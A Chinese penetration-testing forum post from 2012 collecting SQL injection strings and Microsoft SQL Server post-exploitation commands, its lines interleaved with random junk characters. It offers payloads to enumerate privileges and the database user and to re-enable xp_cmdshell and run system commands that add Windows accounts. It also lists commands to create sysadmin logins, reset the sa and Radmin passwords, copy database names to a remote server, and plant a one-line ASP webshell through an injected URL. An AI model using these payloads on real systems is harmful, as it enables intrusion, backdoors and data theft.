中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令0 n0 w7 t1 q8 N3 [6 \1 R: M. w
//看看是什么权限的- _! t: s* |5 ?, S; ^$ i- n0 r
and 1=(Select IS_MEMBER('db_owner'))5 X  |2 z, K5 i0 Q8 U( P! T, K
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
2 ^7 R; R  N/ _  n$ [! R' C: V4 U4 u
//检测是否有读取某数据库的权限+ E4 |: m9 U. A8 y. E! G5 c$ u- F
and 1= (Select HAS_DBACCESS('master')); q) K4 x6 R6 Y- e3 @' U6 w& y
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
' B4 D* Q9 e& C6 n/ O
! }( v$ ]. o& y/ T( f
# s+ y1 I! \0 ], |* [数字类型
/ C. ]& G) ^: g; v5 x+ Oand char(124)%2Buser%2Bchar(124)=0
' T, D5 w6 |+ L2 D  ?6 u* W+ i- J& E9 `5 o- P8 X, E' g
字符类型; M' f8 N# W& A
' and char(124)%2Buser%2Bchar(124)=0 and ''=') P/ ~5 }4 o# D' c

/ d  ?  O' `. T4 p1 n- g搜索类型! ~0 k8 U  t" k0 H! z! S
' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 }  `& T# U; u0 s
+ s3 `' C* d; `
爆用户名
3 ^5 s% C, b: n  gand user>07 V. M! B! c+ x
' and user>0 and ''='
5 P& J0 r- R' M$ a8 S  N  o. q' ^, A9 J" J7 T7 R; F% f. y* t7 J! o
检测是否为SA权限
0 s3 E2 H; U8 h5 i0 jand 1=(select IS_SRVROLEMEMBER('sysadmin'));--8 I1 l0 H/ t; Z% i% ^, y; s/ J
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
" U: _( a& u+ k' J' R  B
; L6 }5 g3 `+ l  e9 z) v检测是不是MSSQL数据库  V- ]! x( O5 f8 m) {2 P1 o
and exists (select * from sysobjects);-- . v$ [. F# V: R: H
% c; C2 b3 A0 b1 V% w0 N( o0 Z
检测是否支持多行1 C4 a2 @4 N3 }& R: G! J+ I
;declare @d int;-- " |; Q* r# n. H0 N( n7 v8 ?: X
) A8 Q- T2 B9 \, ^5 N
恢复 xp_cmdshell8 n. Z0 E" ?) N0 O; [8 H) r
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--# K2 Y5 n, O8 v7 t  w# |% J
$ Q' R" R4 _; m/ ]' g+ |
/ D0 @  ]* H6 b& i
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
  W: F: u6 l7 d- D6 ~
" y+ h& ]0 ~( `) w//-----------------------
0 q7 f& u% e. r$ o; j//      执行命令+ ~6 a1 m9 \* C
//-----------------------# t- E* N; J1 c& y3 v
首先开启沙盘模式:9 s* h% U, d0 Q5 Y+ T' e6 o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: `& s0 N+ T; w+ S7 j) \; c

, k' e3 ]2 }0 j6 f, r然后利用jet.oledb执行系统命令+ ]5 C5 i1 b6 e) }. \7 w
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
8 P) K' A$ Z1 [7 F
  `8 t& O- g/ s4 a执行命令
' Y0 m+ G  {! @! {5 q( X; D8 q;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ S/ v% q* l6 @5 Y+ ]3 L- d* ?; ]7 j# g1 ]3 \! l8 H7 |' v
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'$ Z6 N# z  z! e3 M& B: ?
% `- g! {# q0 m; }( B
判断xp_cmdshell扩展存储过程是否存在:
# j1 b) _, L! C, y( Yhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')  W* `1 N" Z4 y& I( A7 T9 W

5 @7 Z* c7 q  {0 [. {* O$ W写注册表/ b# W% I7 m9 m' J: w
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
9 x: r, T1 T' f5 C& r2 j" I
, j; t7 i9 ^8 i/ ]5 V7 D' d) D9 RREG_SZ! r( O  D( r$ d+ y6 @3 j; M) n1 u5 }7 K

4 `) @/ f) y1 Q# P: r+ g读注册表
9 y) b- Q. @2 n: \7 fexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
- {. }% L  c2 [6 f5 a7 d
2 F; o1 F1 @% P  E: N读取目录内容4 l1 u. j( s, o! H* K& N* U
exec master..xp_dirtree 'c:\winnt\system32\',1,14 D* k* v4 M0 h8 K' m, a( B+ h5 ^) l

$ ^8 Q. a, I6 I9 V+ T( Z4 U  y
- r$ {1 |1 b' \" \& o数据库备份
2 G8 W, {# r3 ?: }backup database pubs to disk = 'c:\123.bak'0 D, q1 Y7 t. v" e( a. k
- C. a8 I+ K) \) H
//爆出长度0 ~$ C( |' a0 b# O0 @9 ~
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
0 S  R1 f9 c! J/ r0 k+ i* i4 o( ^& k, d- w! ]( j

. j( L+ G) L2 j5 C9 ]( {+ A3 T* {
5 z$ W' h5 N1 f+ ~更改sa口令方法:用sql综合利用工具连接后,执行命令:0 ]' \& q% \4 S4 Q" y8 x) _" A
exec sp_password NULL,'新密码','sa'
3 H( }9 Q2 w4 f/ A* T# r3 W1 P/ L
! F. g; A' e* [) E- b添加和删除一个SA权限的用户test:1 K8 c5 |5 n7 m% _
exec master.dbo.sp_addlogin test,ptlove
. B. L9 [6 k: ^1 i6 oexec master.dbo.sp_addsrvrolemember test,sysadmin; P! }2 @. V$ r' ]& [
, B6 d; q* K+ A9 B8 D
删除扩展存储过过程xp_cmdshell的语句: 2 w+ \9 S7 b/ m; o9 u  W/ B* v. \2 p
exec sp_dropextendedproc 'xp_cmdshell'
1 I2 w: n# N5 S, F/ R& `& \: A
5 d9 K5 |' o% g" a- d/ k: g" [, q添加扩展存储过过程: x! D3 N4 k! D; h
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; c  Z/ A( u8 v' Q% |GRANT exec On xp_proxiedadata TO public 3 N; b( Z  }0 q7 J" U' p5 q4 H
, ]: P( `6 S  c0 W
3 a9 _: d8 N; q+ V, H
停掉或激活某个服务。
% ]0 N& q1 O- q" u; v6 O. P5 L2 n3 N, v" N9 P( R) _
exec master..xp_servicecontrol 'stop','schedule'
3 i1 C6 O# i8 g5 S" ^3 Z+ q/ y4 ~exec master..xp_servicecontrol 'start','schedule'5 D0 E6 i) h& s5 c- M# S
- B  s2 s, a0 l% C
dbo.xp_subdirs- p. P! S7 K+ ~

: u' p9 |% S4 N5 T5 U& e- K只列某个目录下的子目录。
5 j. k# t9 M% g" h) f  W) Wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'4 X2 @, t7 o4 f) z) h

$ t" v( L; B0 H5 c  ~dbo.xp_makecab4 ]; f: H) e" S9 m4 U1 ?
, h/ \( w2 h1 }9 S
将目标多个档案压缩到某个目标档案之内。, e% w7 q1 p  X; C) |# F) K' u; s3 P
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
+ B6 ]. J, t/ y+ Y3 r; K
0 j5 q- \& f: B: a0 A0 e5 [dbo.xp_makecab
7 u7 y1 U7 U) u2 a' ]0 `'c:\test.cab','mszip',1,/ `% Z3 S+ n* i8 M& Y6 w
'C:\Inetpub\wwwroot\SQLInject\login.asp',
4 X2 b; [* H  z5 X'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
. ]4 D( d0 ]6 s( R& c  l& d  D: i* m5 g, K! I! y2 o, `* f+ `
xp_terminate_process! F& T+ e6 X' c, l: y3 L7 \0 \& V
6 Q3 g! c: F8 W( d/ M  s* n( ^/ {# T
停掉某个执行中的程序,但赋予的参数是 Process ID。
+ r5 b9 Y) L* U4 T+ H. A+ @利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID2 g0 H. i/ ]0 q' H& I1 A
, {: ~  c0 I/ u3 ?5 w
xp_terminate_process 2484( a% E* H! `9 `4 g

& e- f0 O1 n% _+ U  Fxp_unpackcab6 H8 {0 c4 M/ j, J4 a6 E+ `8 N
6 h  N0 I; f, W! L, I, o
解开压缩档。' d; B) s( @' U6 U2 x

$ \) [  h5 T  L7 `1 K1 ~6 |2 t$ jxp_unpackcab 'c:\test.cab','c:\temp',1
' `  F" B. G+ |- @! f
- E% U8 L5 i9 {( M; H7 o+ i
0 {% K: V/ f6 T5 ^某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234% m; e" M: x" p. l& W$ y) C9 V

/ R0 H: x5 J7 N$ ~create database lcx;
$ z* s9 B. W7 s4 M. kCreate TABLE ku(name nvarchar(256) null);
0 J- `) N; m/ ~" }' aCreate TABLE biao(id int NULL,name nvarchar(256) null);, d& b& D$ s1 Q+ K

5 A; {# ?: [) ^$ Y) b//得到数据库名
5 k& F) w. l2 k; Uinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
0 `& U) j  g3 H; z5 C. J( f7 z" D- ], k" M- E5 M/ y# H$ u; G- a
8 a! U6 q$ B2 f+ W3 h/ O
//在Master中创建表,看看权限怎样& C& ^6 O4 @" N( d, z
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--% r0 _% I' ^1 J# G( v

. V( P5 |! _: ~用 sp_makewebtask直接在web目录里写入一句话马:% G6 t& {2 b5 ]. D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--: Q& Q% E/ m; U' ?
8 X: r+ a1 S% H+ g; _0 U
//更新表内容% ~' x- p) i# t! c" B5 n6 P
Update films SET kind = 'Dramatic' Where id = 1237 ^9 h: q- \: ?" G4 P0 D' A( m
! f1 J4 n$ X- ^: l, \  _6 I  r
//删除内容
2 }6 f4 {2 O& V4 Y, x. F& udelete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2